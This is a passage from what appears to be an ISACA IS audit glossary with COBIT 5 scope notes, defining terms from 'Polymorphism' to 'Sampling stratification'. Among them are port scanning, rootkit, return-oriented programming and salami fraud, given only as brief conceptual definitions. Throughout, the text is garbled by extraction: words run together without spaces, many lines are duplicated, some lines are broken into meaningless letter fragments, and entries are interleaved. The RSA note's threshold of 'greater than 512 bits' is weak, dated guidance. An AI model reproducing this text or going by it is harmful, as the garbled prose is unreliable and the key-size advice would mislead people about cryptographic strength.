failingtocomplywiththepolicy,themeansforhandlingexceptions,andthemannerinwhich
compliancewiththepolicywillbecheckedandmeasured.
2.Overallintentionanddirectionasformallyexpressedbymanagement
Scope Note: COBIT 5 perspective Scope Note: COBIT 5 perspective
Polymorphism
(Objects)
Polymorphismreferstodatabasestructuresthatsendthesamecommandtodifferentchild
objectsthatcanproducedifferentresultsdependingontheirfamilyhierarchicaltreestructure
Population TheentiresetofdatafromwhichasampleisselectedandaboutwhichanISauditorwishesto
drawconclusions
Port(Portnumber) Aprocessorapplicationspecificsoftwareelementservingasacommunicationendpointfor
theTransportLayerIPprotocols(UDPandTCP)
Portscanning Theactofprobingasystemtoidentifyopenports
Portfolio Agroupingof"objectsofinterest"(investmentprograms,ITservices,ITprojects,otherIT
assetsorresources)managedandmonitoredtooptimizebusinessvalue
(TheinvestmentportfolioisofprimaryinteresttoValIT.ITservice,project,assetandother
resourceportfoliosareofprimaryinteresttoCOBIT.)
Posting Theprocessofactuallyenteringtransactionsintocomputerizedormanualfiles
ScopeNote:Postingtransactionsmightimmediatelyupdatethemasterfilesormayresultin
memoposting,inwhichthetransactionsareaccumulatedoveraperiodoftimeandthen
appliedtomasterfileupdating.
Preventive application Application control that is intended to prevent an error from occurring Preventiveapplication
control
Applicationcontrolthatisintendedtopreventanerrorfromoccurring
Preventiveapplicationcontrolsaretypicallyexecutedatthetransactionlevel,beforeanaction
isperformed.
Preventivecontrol Aninternalcontrolthatisusedtoavoidundesirableevents,errorsandotheroccurrencesthat
anenterprisehasdeterminedcouldhaveanegativematerialeffectonaprocessorend
product product
Primenumber Anaturalnumbergreaterthan1thatcanonlybedividedby1anditself.
PRINCE2(Projectsina
Controlled
Environment)
DevelopedbytheOfficeofGovernmentCommerce(OGC),PRINCE2isaprojectmanagement
methodthatcoversthemanagement,controlandorganizationofaproject.
Term Definition
Principle Anenablerofgovernanceandofmanagement.Comprisesthevaluesandfundamental
assumptions held by the enterprise the beliefs that guide and put boundaries around the assumptionsheldbytheenterprise,thebeliefsthatguideandputboundariesaroundthe
enterprisesdecisionmaking,communicationwithinandoutsidetheenterprise,and
stewardshipcaringforassetsownedbyanother.
ScopeNote:Examples:Ethicscharter,socialresponsibilitycharter.
COBIT 5 perspective COBIT5perspective
Principleofleast
privilege/access
Controlsusedtoallowtheleastprivilegeaccessneededtocompleteatask
Privacy Freedomfromunauthorizedintrusionordisclosureofinformationaboutanindividual
Privatebranch
exchange(PBX)
Atelephoneexchangethatisownedbyaprivatebusiness,asopposedtooneownedbya
commoncarrierorbyatelephonecompany
Privatekey Amathematicalkey(keptsecretbytheholder)usedtocreatedigitalsignaturesand, y y ( p y ) g g ,
dependingonthealgorithm,todecryptmessagesorfilesencrypted(forconfidentiality)with
thecorrespondingpublickey
Privatekey
cryptosystems
Usedindataencryption,itutilizesasecretkeytoencrypttheplaintexttotheciphertext.
Privatekeycryptosystemsalsousethesamekeytodecrypttheciphertexttothe
correspondingplaintext.
ScopeNote:Inthiscase,thekeyissymmetricsuchthattheencryptionkeyisequivalenttothe
decryptionkey.
Privilege Theleveloftrustwithwhichasystemobjectisimbued
Probe Inspectanetworkorsystemtofindweakspots
Problem InIT,theunknownunderlyingcauseofoneormoreincidents
Problemescalation
d
Theprocessofescalatingaproblemupfromjuniortoseniorsupportstaff,andultimatelyto
hi h l l f procedure higherlevelsofmanagement
ScopeNote:Problemescalationprocedureisoftenusedinhelpdeskmanagement,whenan
unresolvedproblemisescalatedupthechainofcommand,untilitissolved.
Procedure Adocumentcontainingadetaileddescriptionofthestepsnecessarytoperformspecific
operationsinconformancewithapplicablestandards.Proceduresaredefinedaspartof
processes processes.
Process Generally,acollectionofactivitiesinfluencedbytheenterprisespoliciesandproceduresthat
takesinputsfromanumberofsources,(includingotherprocesses),manipulatestheinputs
andproducesoutputs
ScopeNote:Processeshaveclearbusinessreasonsforexisting,accountableowners,clear
roles and responsibilities around the execution of the process and the means to measure rolesandresponsibilitiesaroundtheexecutionoftheprocess,andthemeanstomeasure
performance.
Term Definition
Processgoals Astatementdescribingthedesiredoutcomeofaprocess.
ScopeNote:Anoutcomecanbeanartifact,asignificantchangeofastateorasignificant
capabilityimprovementofotherprocesses.
COBIT5perspective
Processmaturity
assessment
AsubjectiveassessmenttechniquederivedfromtheSoftwareEngineeringInstitute(SEI)
capability maturity model integration (CMMI) concepts and developed as a COBIT assessment capabilitymaturitymodelintegration(CMMI)conceptsanddevelopedasaCOBIT
managementtool
ItprovidesmanagementwithaprofileofhowwelldevelopedtheITmanagementprocesses
are.
ScopeNote:Itenablesmanagementtoeasilyplaceitselfonascaleandappreciatewhatis ScopeNote:Itenablesmanagementtoeasilyplaceitselfonascaleandappreciatewhatis
requiredifimprovedperformanceisneeded.Itisusedtosettargets,raiseawareness,capture
broadconsensus,identifyimprovementsandpositivelymotivatechange.
Processmaturity
attribute
Thedifferentaspectsofaprocesscoveredinanassuranceinitiative
Productionprogram Programusedtoprocessliveoractualdatathatwerereceivedasinputintotheproduction
environment
Productionsoftware Softwarethatisbeingusedandexecutedtosupportnormalandauthorizedorganizational
operations
ScopeNote:Productionsoftwareistobedistinguishedfromtestsoftware,whichisbeing
developedormodified,buthasnotyetbeenauthorizedforusebymanagement.
P f i l P l l f bilit ft li k d t lifi ti i d b l t f i l b di d Professional
competence
Provenlevelofability,oftenlinkedtoqualificationsissuedbyrelevantprofessionalbodiesand
compliancewiththeircodesofpracticeandstandards
Professional
judgement
Theapplicationofrelevantknowledgeandexperienceinmakinginformeddecisionsaboutthe
coursesofactionthatareappropriateinthecircumstancesoftheISauditandassurance
engagement
Professional
skepticism
Anattitudethatincludesaquestioningmindandacriticalassessmentofauditevidence
skepticism
ScopeNote:Source:AmericanInstituteofCertifiedPublicAccountants(AICPA)AU230.07
Professional
standards
ReferstostandardsissuedbyISACA.
The term may extend to related guidelines and techniques that assist the professional in Thetermmayextendtorelatedguidelinesandtechniquesthatassisttheprofessionalin
implementingandcomplyingwithauthoritativepronouncementsofISACA.Incertain
instances,standardsofotherprofessionalorganizationsmaybeconsidered,dependingonthe
circumstancesandtheirrelevanceandappropriateness.
Term Definition
Program Astructuredgroupingofinterdependentprojectsthatisbothnecessaryandsufficientto
achieve a desired business outcome and create value achieveadesiredbusinessoutcomeandcreatevalue
Theseprojectscouldinclude,butarenotlimitedto,changesinthenatureofthebusiness,
businessprocessesandtheworkperformedbypeopleaswellasthecompetenciesrequiredto
carryoutthework,theenablingtechnology,andtheorganizationalstructure.
Programandproject Thefunctionresponsibleforsupportingprogramandprojectmanagers,andgathering, Programandproject
managementoffice
(PMO)
Thefunctionresponsibleforsupportingprogramandprojectmanagers,andgathering,
assessingandreportinginformationabouttheconductoftheirprogramsandconstituent
projects
ProgramEvaluation
andReview
Technique(PERT)
Aprojectmanagementtechniqueusedintheplanningandcontrolofsystemprojects
Programflowchart Showsthesequenceofinstructionsinasingleprogramorsubroutine g q g p g
ScopeNote:Thesymbolsusedinprogramflowchartsshouldbetheinternationallyaccepted
standard.Programflowchartsshouldbeupdatedwhennecessary.
Programnarrative Providesadetailedexplanationofprogramflowcharts,includingcontrolpointsandany
externalinput
Project Astructuredsetofactivitiesconcernedwithdeliveringadefinedcapability(thatisnecessary
butnotsufficient,toachievearequiredbusinessoutcome)totheenterprisebasedonan
agreedonscheduleandbudget
Projectmanagement
officer(PMO)
Theindividualfunctionresponsiblefortheimplementationofaspecifiedinitiativefor
supportingtheprojectmanagementroleandadvancingthedisciplineofprojectmanagement
Projectportfolio Thesetofprojectsownedbyacompany
ScopeNote:Itusuallyincludesthemainguidelinesrelativetoeachproject,including
objectives,costs,timelinesandotherinformationspecifictotheproject.
Projectteam Groupofpeopleresponsibleforaproject,whosetermsofreferencemayincludethe
development,acquisition,implementationormaintenanceofanapplicationsystem
Scope Note: The project team members may include line management operational line staff ScopeNote:Theprojectteammembersmayincludelinemanagement,operationallinestaff,
externalcontractorsandISauditors.
Promiscuousmode Allowsthenetworkinterfacetocaptureallnetworktrafficirrespectiveofthehardwaredevice
towhichthepacketisaddressed
Protectiondomain Theareaofthesystemthattheintrusiondetectionsystem(IDS)ismeanttomonitorand
protect
Protocol The rules by which a network operates and controls the flow and priority of transmissions Protocol Therulesbywhichanetworkoperatesandcontrolstheflowandpriorityoftransmissions
Protocolconverter Hardwaredevices,suchasasynchronousandsynchronoustransmissions,thatconvert
betweentwodifferenttypesoftransmission
Term Definition
Protocolstack Asetofutilitiesthatimplementaparticularnetworkprotocol
ScopeNote:Forinstance,inWindowsmachinesaTransmissionControlProtocol/Internet
Protocol(TCP/IP)stackconsistsofTCP/IPsoftware,socketssoftwareandhardwaredriver
software.
Prototyping Theprocessofquicklyputtingtogetheraworkingmodel(aprototype)inordertotestvarious
aspectsofadesign,illustrateideasorfeaturesandgatherearlyuserfeedback
ScopeNote:Prototypingusesprogrammedsimulationtechniquestorepresentamodelofthe
finalsystemtotheuserforadvisementandcritique.Theemphasisisonenduserscreensand
reports.Internalcontrolsarenotapriorityitemsincethisisonlyamodel.
Proxyserver Aserverthatactsonbehalfofauser
ScopeNote:Typicalproxiesacceptaconnectionfromauser,makeadecisionastowhether
theuserorclientIPaddressispermittedtousetheproxy,perhapsperformadditional
authentication,andcompleteaconnectiontoaremotedestinationonbehalfoftheuser.
Publickey Inanasymmetriccryptographicscheme,thekeythatmaybewidelypublishedtoenablethe
operationofthescheme
Publickey
cryptosystem
Usedindataencryption,itusesanencryptionkey,asapublickey,toencrypttheplaintextto
theciphertext.Itusesthedifferentdecryptionkey,asasecretkey,todecrypttheciphertextto
thecorrespondingplaintext.
ScopeNote:Incontrasttoaprivatekeycryptosystem,thedecryptionkeyshouldbesecret;
however,theencryptionkeycanbeknowntoeveryone.Inapublickeycryptosystem,two
keysareasymmetric,suchthattheencryptionkeyisnotequivalenttothedecryptionkey.
Publickeyencryption Acryptographicsystemthatusestwokeys:oneisapublickey,whichisknowntoeveryone,
andthesecondisaprivateorsecretkey,whichisonlyknowntotherecipientofthemessage
SeealsoAsymmetricKey.
Publickey
infrastructure(PKI)
Aseriesofprocessesandtechnologiesfortheassociationofcryptographickeyswiththeentity
towhomthosekeyswereissued
Publicswitched
telephonenetwork
(PSTN)
Acommunicationssystemthatsetsupadedicatedchannel(orcircuit)betweentwopointsfor
thedurationofthetransmission.
Quality Being fit for purpose (achieving intended value) Quality Beingfitforpurpose(achievingintendedvalue)
Qualityassurance
(QA)
Aplannedandsystematicpatternofallactionsnecessarytoprovideadequateconfidencethat
anitemorproductconformstoestablishedtechnicalrequirements.(ISO/IEC24765)
Term Definition
Qualitymanagement
system (QMS)
Asystemthatoutlinesthepoliciesandproceduresnecessarytoimproveandcontrolthe
various processes that will ultimately lead to improved enterprise performance system(QMS) variousprocessesthatwillultimatelyleadtoimprovedenterpriseperformance
Queue Agroupofitemsthatiswaitingtobeservicedorprocessed
Quickship Arecoverysolutionprovidedbyrecoveryand/orhardwarevendorsandincludesapre
establishedcontracttodeliverhardwareresourceswithinaspecifiednumberamountofhours
afteradisasteroccurs
ScopeNote:Thequickshipsolutionusuallyprovidesenterpriseswiththeabilitytorecover
within72ormorehours.
RACIchart IllustrateswhoisResponsible,Accountable,ConsultedandInformedwithinanorganizational
framework
Radiowave
interference
Thesuperpositionoftwoormoreradiowavesresultinginadifferentradiowavepatternthat
ismoredifficulttointerceptanddecodeproperly p p p y
Randomaccess
memory(RAM)
Thecomputersprimaryworkingmemory
ScopeNote:EachbyteofRAMcanbeaccessedrandomlyregardlessofadjacentbytes.
Rangecheck Rangechecksensurethatdatafallwithinapredeterminedrange
Ransomware Malwarethatrestrictsaccesstothecompromisedsystemsuntilaransomdemandissatisfied
Rapidapplication
development
Amethodologythatenablesenterprisestodevelopstrategicallyimportantsystemsfaster,
whilereducingdevelopmentcostsandmaintainingqualitybyusingaseriesofproven
applicationdevelopmenttechniques,withinawelldefinedmethodology
Realtimeanalysis Analysisthatisperformedonacontinuousbasis,withresultsgainedintimetoaltertherun
timesystem
R l ti i A i t ti li t bilit th t i di t l d t t fil h Realtimeprocessing Aninteractiveonlinesystemcapabilitythatimmediatelyupdatescomputerfileswhen
transactionsareinitiatedthroughaterminal
Reasonableassurance Alevelofcomfortshortofaguarantee,butconsideredadequategiventhecostsofthecontrol
andthelikelybenefitsachieved
Reasonablenesscheck Comparesdatatopredefinedreasonabilitylimitsoroccurrenceratesestablishedforthedata
Reciprocal agreement Emergency processing agreement between two or more enterprises with similar equipment or Reciprocalagreement Emergencyprocessingagreementbetweentwoormoreenterpriseswithsimilarequipmentor
applications
ScopeNote:Typically,participantsofareciprocalagreementpromisetoprovideprocessing
timetoeachotherwhenanemergencyarises.
Record Acollectionofrelatedinformationthatistreatedasaunit
ScopeNote:Separatefieldswithintherecordareusedforprocessingoftheinformation.
Record,screenand
reportlayouts
Recordlayoutsprovideinformationregardingthetypeofrecord,itssizeandthetypeofdata
containedintherecord.Screenandreportlayoutsdescribewhatinformationisprovidedand
necessaryforinput.
Term Definition
Recovery Thephaseintheincidentresponseplanthatensuresthataffectedsystemsorservicesare
restored to a condition specified in the service delivery objectives (SDOs) or business restoredtoaconditionspecifiedintheservicedeliveryobjectives(SDOs)orbusiness
continuityplan(BCP)
Recoveryaction Executionofaresponseortaskaccordingtoawrittenprocedure
Recoverypoint
objective(RPO)
Determinedbasedontheacceptabledatalossincaseofadisruptionofoperations
Itindicatestheearliestpointintimethatisacceptabletorecoverthedata.TheRPOeffectively
quantifies the permissible amount of data loss in case of interruption. quantifiesthepermissibleamountofdatalossincaseofinterruption.
Recoverystrategy Anapproachbyanenterprisethatwillensureitsrecoveryandcontinuityinthefaceofa
disasterorothermajoroutage
ScopeNote:Plansandmethodologiesaredeterminedbytheenterprise'sstrategy.Theremay
bemorethanonemethodologyorsolutionforanenterprise'sstrategy.
Examplesofmethodologiesandsolutionsinclude:contractingforhotsiteorcoldsite,building
aninternalhotsiteorcoldsite,identifyinganalternateworkarea,aconsortiumorreciprocal
agreement,contractingformobilerecoveryorcrateandship,andmanyothers.
Recoverytesting Atesttocheckthesystemsabilitytorecoverafterasoftwareorhardwarefailure
Recoverytime Theamountoftimeallowedfortherecoveryofabusinessfunctionorresourceafteradisaster
objective(RTO) occurs
Redologs Filesmaintainedbyasystem,primarilyadatabasemanagementsystem(DBMS),forthe
purposeofreapplyingchangesfollowinganerrororoutagerecovery
Redundancycheck Detectstransmissionerrorsbyappendingcalculatedbitsontotheendofeachsegmentofdata
RedundantArrayof
I i Di k
Providesperformanceimprovementsandfaulttolerantcapabilitiesviahardwareorsoftware
l i b i i i f l i l di k i f d/ l InexpensiveDisks
(RAID)
solutions,bywritingtoaseriesofmultiplediskstoimproveperformanceand/orsavelarge
filessimultaneously
Redundantsite ArecoverystrategyinvolvingtheduplicationofkeyITcomponents,includingdataorotherkey
businessprocesses,wherebyfastrecoverycantakeplace
Reengineering Aprocessinvolvingtheextractionofcomponentsfromexistingsystemsandrestructuring
thesecomponentstodevelopnewsystemsortoenhancetheefficiencyofexistingsystems
ScopeNote:Existingsoftwaresystemscanbemodernizedtoprolongtheirfunctionality.An
exampleisasoftwarecodetranslatorthatcantakeanexistinghierarchicaldatabasesystem
andtransposeittoarelationaldatabasesystem.Computeraidedsoftwareengineering(CASE)
includesasourcecodereengineeringfeature.
Registeredports Registeredports1024through49151:ListedbytheIANAandonmostsystemscanbeusedby
ordinaryuserprocessesorprogramsexecutedbyordinaryusers
Registrationauthority
(RA)
Theindividualinstitutionthatvalidatesanentity'sproofofidentityandownershipofakeypair
Term Definition
Regressiontesting Atestingtechniqueusedtoretestearlierprogramabendsorlogicalerrorsthatoccurred
during the initial testing phase duringtheinitialtestingphase
Regulation Rulesorlawsdefinedandenforcedbyanauthoritytoregulateconduct
Regulatory
requirements
Rulesorlawsthatregulateconductandthattheenterprisemustobeytobecomecompliant
Relationaldatabase
managementsystem
(RDBMS)
Thegeneralpurposeofadatabaseistostoreandretrieverelatedinformation.
Scope Note: Database management systems have evolved from hierarchal to network to (RDBMS) ScopeNote:Databasemanagementsystemshaveevolvedfromhierarchaltonetworkto
relationalmodels.Today,themostwidelyaccepteddatabasemodelistherelationalmodel.
Therelationalmodelhasthreemajoraspects:structures,operationsandintegrityrules.An
Oracledatabaseisacollectionofdatathatistreatedasaunit.
Relevantaudit
evidence
Auditevidenceisrelevantifitpertainstotheauditobjectivesandhasalogicalrelationshipto
thefindingsandconclusionsitisusedtosupport.
Relevantinformation Relatingtocontrols,tellstheevaluatorsomethingmeaningfulabouttheoperationofthe g , g g p
underlyingcontrolsorcontrolcomponent.Informationthatdirectlyconfirmstheoperationof
controlsismostrelevant.Informationthatrelatesindirectlytotheoperationofcontrolscan
alsoberelevant,butislessrelevantthandirectinformation.
ScopeNote:RefertoCOBIT5informationqualitygoals
Reliableaudit Auditevidenceisreliableif,intheISauditor'sopinion,itisvalid,factual,objectiveand
evidence supportable.
Reliableinformation Informationthatisaccurate,verifiableandfromanobjectivesource
Remediation Aftervulnerabilitiesareidentifiedandassessed,appropriateremediationcantakeplaceto
mitigateoreliminatethevulnerability
R t R f t bi ti f h d d ft t bl th t t t l Remoteaccess
service(RAS)
Referstoanycombinationofhardwareandsoftwaretoenabletheremoteaccesstotoolsor
informationthattypicallyresideonanetworkofITdevices
ScopeNote:OriginallycoinedbyMicrosoftwhenreferringtotheirbuiltinNTremoteaccess
tools,RASwasaserviceprovidedbyWindowsNTwhichallowedmostoftheservicesthat
wouldbeavailableonanetworktobeaccessedoveramodemlink.Overtheyears,many
d h id d b th h d d ft l ti t i t t i vendorshaveprovidedbothhardwareandsoftwaresolutionstogainremoteaccesstovarious
typesofnetworkedinformation.Infact,mostmodernroutersincludeabasicRAScapability
that can be enabled for any dialup interface.
Remote
AuthenticationDialin
UserService(RADIUS)
Atypeofserviceprovidinganauthenticationandaccountingsystemoftenusedfordialupand
remoteaccesssecurity
Remotejobentry
(RJE)
Thetransmissionofjobcontrollanguage(JCL)andbatchesoftransactionsfromaremote
terminallocation
Term Definition
Remoteprocedure
call (RPC)
ThetraditionalInternetserviceprotocolwidelyusedformanyyearsonUNIXbasedoperating
systems and supported by the Internet Engineering Task Force (IETF) that allows a program on call(RPC) systemsandsupportedbytheInternetEngineeringTaskForce(IETF)thatallowsaprogramon
onecomputertoexecuteaprogramonanother(e.g.,server)
ScopeNote:Theprimarybenefitderivedfromitsuseisthatasystemdeveloperneednot
developspecificproceduresforthetargetedcomputersystem.Forexample,inaclientserver
arrangement,theclientprogramsendsamessagetotheserverwithappropriatearguments,
and the server returns a message containing the results of the program executed Common andtheserverreturnsamessagecontainingtheresultsoftheprogramexecuted.Common
ObjectRequestBrokerArchitecture(CORBA)andDistributedComponentObjectModel
(DCOM)aretwonewerobjectorientedmethodsforrelatedRPCfunctionality.
Removablemedia Anytypeofstoragedevicethatcanberemovedfromthesystemwhileisrunning
Repeaters Aphysicallayerdevicethatregeneratesandpropagateselectricalsignalsbetweentwo
networksegments g
ScopeNote:Repeatersreceivesignalsfromonenetworksegmentandamplify(regenerate)
thesignaltocompensateforsignals(analogordigital)distortedbytransmissionlossdueto
reductionofsignalstrengthduringtransmission(i.e.,attenuation)
Replay Theabilitytocopyamessageorstreamofmessagesbetweentwopartiesandreplay
(retransmit)themtooneormoreoftheparties
Replication Initsbroadcomputingsense,involvestheuseofredundantsoftwareorhardwareelementsto
provideavailabilityandfaulttolerantcapabilities
Inadatabasecontext,replicationinvolvesthesharingofdatabetweendatabasestoreduce
workloadamongdatabaseservers,therebyimprovingclientperformancewhilemaintaining
consistencyamongallsystems.
Repository Anenterprisedatabasethatstoresandorganizesdata
Representation Asignedororalstatementissuedbymanagementtoprofessionals,wheremanagement
declaresthatacurrentorfuturefact(e.g.,process,system,procedure,policy)isorwillbeina
certainstate,tothebestofmanagementsknowledge.
Repudiation Thedenialbyoneofthepartiestoatransaction,orparticipationinallorpartofthat
transaction or of the content of communication related to that transaction transaction,orofthecontentofcommunicationrelatedtothattransaction
Reputationrisk Thecurrentandprospectiveeffectonearningsandcapitalarisingfromnegativepublicopinion
ScopeNote:Reputationriskaffectsabanksabilitytoestablishnewrelationshipsorservices,
ortocontinueservicingexistingrelationships.Itmayexposethebanktolitigation,financial
lossoradeclineinitscustomerbase.AbanksreputationcanbedamagedbyInternetbanking
services that are executed poorly or otherwise alienate customers and the public An Internet servicesthatareexecutedpoorlyorotherwisealienatecustomersandthepublic.AnInternet
bankhasagreaterreputationriskascomparedtoatraditionalbrickandmortarbank,because
itiseasierforitscustomerstoleaveandgotoadifferentInternetbankandsinceitcannot
discussanyproblemsinpersonwiththecustomer.
Term Definition
Requestfor
comments (RFC)
AdocumentthathasbeenapprovedbytheInternetEngineeringTaskForce(IETF)becomesan
RFC and is assigned a unique number once published comments(RFC) RFCandisassignedauniquenumberoncepublished
ScopeNote:IftheRFCgainsenoughinterest,itmayevolveintoanInternetstandard.
Requestforproposal
(RFP)
Adocumentdistributedtosoftwarevendorsrequestingthemtosubmitaproposaltodevelop
orprovideasoftwareproduct
Requirements
definition
Atechniqueusedinwhichtheaffectedusergroupsdefinetherequirementsofthesystemfor
meeting the defined needs definition meetingthedefinedneeds
ScopeNote:Someofthesearebusiness,regulatory,andsecurityrelatedrequirementsas
wellasdevelopmentrelatedrequirements.
Residualrisk Theremainingriskaftermanagementhasimplementedariskresponse
Resilience Theabilityofasystemornetworktoresistfailureortorecoverquicklyfromanydisruption,
usuallywithminimalrecognizableeffect y g
Resource Anyenterpriseassetthatcanhelptheorganizationachieveitsobjectives
Resource
optimization
Oneofthegovernanceobjectives.Involveseffective,efficientandresponsibleuseofall
resourceshuman,financial,equipment,facilities,etc.
Responsible InaResponsible,Accountable,Consulted,Informed(RACI)chart,referstothepersonwho
mustensurethatactivitiesarecompletedsuccessfully
Returnoninvestment
(ROI)
Ameasureofoperatingperformanceandefficiency,computedinitssimplestformbydividing
netincomebythetotalinvestmentovertheperiodbeingconsidered
Returnoriented
k
Anexploittechniqueinwhichtheattackerusescontrolofthecallstacktoindirectlyexecute
h i k d hi i i i di l i h i i i b i attacks cherrypickedmachineinstructionsimmediatelypriortothereturninstructioninsubroutines
withintheexistingprogramcode
Reverseengineering Asoftwareengineeringtechniquewherebyanexistingapplicationsystemcodecanbe
redesignedandcodedusingcomputeraidedsoftwareengineering(CASE)technology
Ringconfiguration Usedineithertokenringorfiberdistributeddatainterface(FDDI)networks,allstations
(nodes)areconnectedtoamultistationaccessunit(MSAU),thatphysicallyresemblesastar
type topology typetopology.
ScopeNote:AringconfigurationiscreatedwhenMSAUsarelinkedtogetherinforminga
network.Messagesinthenetworkaresentinadeterministicfashionfromsenderand
receiverviaasmallframe,referredtoasatokenring.Tosendamessage,asenderobtainsthe
tokenwiththerightpriorityasthetokentravelsaroundthering,withreceivingnodesreading
those messages addressed to it those messages addressed to it.
Term Definition
Ringtopology Atypeoflocalareanetwork(LAN)architectureinwhichthecableformsaloop,withstations
attached at intervals around the loop attachedatintervalsaroundtheloop
ScopeNote:Inringtopology,signalstransmittedaroundtheringtaketheformofmessages.
Eachstationreceivesthemessagesandeachstationdetermines,onthebasisofanaddress,
whethertoacceptorprocessagivenmessage.However,afterreceivingamessage,each
stationactsasarepeater,retransmittingthemessageatitsoriginalsignalstrength.
Risk Thecombinationoftheprobabilityofaneventanditsconsequence.(ISO/IEC73)
Riskacceptance Iftheriskiswithintheenterprise'srisktoleranceorifthecostofotherwisemitigatingtherisk
ishigherthanthepotentialloss,theenterprisecanassumetheriskandabsorbanylosses
Riskaggregation Theprocessofintegratingriskassessmentsatacorporateleveltoobtainacompleteviewon
theoverallriskfortheenterprise p
Riskanalysis 1.AprocessbywhichfrequencyandmagnitudeofITriskscenariosareestimated
2.Theinitialstepsofriskmanagement:analyzingthevalueofassetstothebusiness,
identifyingthreatstothoseassetsandevaluatinghowvulnerableeachassetistothosethreats
ScopeNote:Itofteninvolvesanevaluationoftheprobablefrequencyofaparticularevent,as p p q y p
wellastheprobableimpactofthatevent.
Riskappetite Theamountofrisk,onabroadlevel,thatanentityiswillingtoacceptinpursuitofitsmission
Riskassessment Aprocessusedtoidentifyandevaluateriskanditspotentialeffects
S i k d id if h i h h ScopeNote:Riskassessmentsareusedtoidentifythoseitemsorareasthatpresentthe
highestrisk,vulnerabilityorexposuretotheenterpriseforinclusionintheISannualauditplan.
Riskassessmentsarealsousedtomanagetheprojectdeliveryandprojectbenefitrisk.
Risk avoidance The process for systematically avoiding risk constituting one approach to managing risk Riskavoidance Theprocessforsystematicallyavoidingrisk,constitutingoneapproachtomanagingrisk
Riskculture Thesetofsharedvaluesandbeliefsthatgovernsattitudestowardrisktaking,careand
integrity,anddetermineshowopenlyriskandlossesarereportedanddiscussed
Riskevaluation Theprocessofcomparingtheestimatedriskagainstgivenriskcriteriatodeterminethe
significanceoftherisk.[ISO/IECGuide73:2002]
Risk factor A condition that can influence the frequency and/or magnitude and ultimately the business Riskfactor Aconditionthatcaninfluencethefrequencyand/ormagnitudeand,ultimately,thebusiness
impactofITrelatedevents/scenarios
Riskindicator Ametriccapableofshowingthattheenterpriseissubjectto,orhasahighprobabilityofbeing
subjectto,ariskthatexceedsthedefinedriskappetite
Term Definition
Riskmanagement 1.Thecoordinatedactivitiestodirectandcontrolanenterprisewithregardtorisk
ScopeNote:IntheInternationalStandard,theterm"control"isusedasasynonymfor
"measure."(ISO/IECGuide73:2002)
2.Oneofthegovernanceobjectives.Entailsrecognizingrisk;assessingtheimpactand
likelihoodofthatrisk;anddevelopingstrategies,suchasavoidingtherisk,reducingthe
negative effect of the risk and/or transferring the risk to manage it within the context of the negativeeffectoftheriskand/ortransferringtherisk,tomanageitwithinthecontextofthe
enterprisesriskappetite.
Scope Note: COBIT 5 perspective
Riskmap A(graphic)toolforrankinganddisplayingriskbydefinedrangesforfrequencyandmagnitude
Riskmitigation Themanagementofriskthroughtheuseofcountermeasuresandcontrols g g g
Riskportfolioview 1.Amethodtoidentifyinterdependenciesandinterconnectionsamongrisk,aswellasthe
effectofriskresponsesonmultipletypesofrisk
2.Amethodtoestimatetheaggregateimpactofmultipletypesofrisk(e.g.,cascadingand
coincidentalthreattypes/scenarios,riskconcentration/correlationacrosssilos)andthe
potentialeffectofriskresponseacrossmultipletypesofrisk
Riskreduction Theimplementationofcontrolsorcountermeasurestoreducethelikelihoodorimpactofa
risktoalevelwithintheorganizationsrisktolerance.
Risktolerance Theacceptablelevelofvariationthatmanagementiswillingtoallowforanyparticularriskas
theenterprisepursuesitsobjectives
Risktransfer Theprocessofassigningrisktoanotherenterprise,usuallythroughthepurchaseofan
insurancepolicyorbyoutsourcingtheservice
Ri k t t t Th f l ti d i l t ti f t dif i k (ISO/IEC G id Risktreatment Theprocessofselectionandimplementationofmeasurestomodifyrisk(ISO/IECGuide
73:2002)
Rootcauseanalysis Aprocessofdiagnosistoestablishtheoriginsofevents,whichcanbeusedforlearningfrom
consequences,typicallyfromerrorsandproblems
Rootkit Asoftwaresuitedesignedtoaidanintruderingainingunauthorizedadministrativeaccesstoa
computersystem
Rotating standby A fail over process in which there are two nodes (as in idle standby but without priority) Rotatingstandby Afailoverprocessinwhichtherearetwonodes(asinidlestandbybutwithoutpriority)
ScopeNote:Thenodethatenterstheclusterfirstownstheresourcegroup,andthesecond
willjoinasastandbynode.
Roundingdown Amethodofcomputerfraudinvolvingacomputercodethatinstructsthecomputertoremove
small amounts of money from an authorized computer transaction by rounding down to the smallamountsofmoneyfromanauthorizedcomputertransactionbyroundingdowntothe
nearestwholevaluedenominationandreroutingtheroundedoffamounttotheperpetrators
account
Term Definition
Router Anetworkingdevicethatcansend(route)datapacketsfromonelocalareanetwork(LAN)or
wide area network (WAN) to another based on addressing at the network layer (Layer 3) in wideareanetwork(WAN)toanother,basedonaddressingatthenetworklayer(Layer3)in
theopensystemsinterconnection(OSI)model
ScopeNote:Networksconnectedbyrouterscanusedifferentorsimilarnetworkingprotocols.
Routersusuallyarecapableoffilteringpacketsbasedonparameters,suchassource
addresses,destinationaddresses,protocolandnetworkapplications(ports).
RS232interface Aninterfacebetweendataterminalequipmentanddatacommunicationsequipment RS 232interface Aninterfacebetweendataterminalequipmentanddatacommunicationsequipment
employingserialbinarydatainterchange
RSA ApublickeycryptosystemdevelopedbyR.Rivest,A.ShamirandL.Adlemanusedforboth
encryptionanddigitalsignatures
ScopeNote:TheRSAhastwodifferentkeys,thepublicencryptionkeyandthesecret
decryptionkey.ThestrengthoftheRSAdependsonthedifficultyoftheprimenumber decryptionkey.ThestrengthoftheRSAdependsonthedifficultyoftheprimenumber
factorization.Forapplicationswithhighlevelsecurity,thenumberofthedecryptionkeybits
shouldbegreaterthan512bits.
Rulebase Thelistofrulesand/orguidancethatisusedtoanalyzeeventdata
Runinstructions Computeroperatinginstructionswhichdetailthestepbystepprocessesthataretooccurso
anapplicationsystemcanbeproperlyexecuted;alsoidentifieshowtoaddressproblemsthat
occurduringprocessing
Runtoruntotals Provideevidencethataprogramprocessesallinputdataandthatitprocessedthedata
correctly
Safeguard Apractice,procedureormechanismthatreducesrisk
Salamitechnique Amethodofcomputerfraudinvolvingacomputercodethatinstructsthecomputertosliceoff
smallamountsofmoneyfromanauthorizedcomputertransactionandreroutethisamountto
theperpetratorsaccount
S li i k Th b bilit th t IS dit h h d i t l i b dit Samplingrisk TheprobabilitythatanISauditorhasreachedanincorrectconclusionbecauseanaudit
sample,ratherthantheentirepopulation,wastested
ScopeNote:Whilesamplingriskcanbereducedtoanacceptablylowlevelbyusingan
appropriatesamplesizeandselectionmethod,itcanneverbeeliminated.
Sampling
stratification
Theprocessofdividingapopulationintosubpopulationswithsimilarcharacteristicsexplicitly
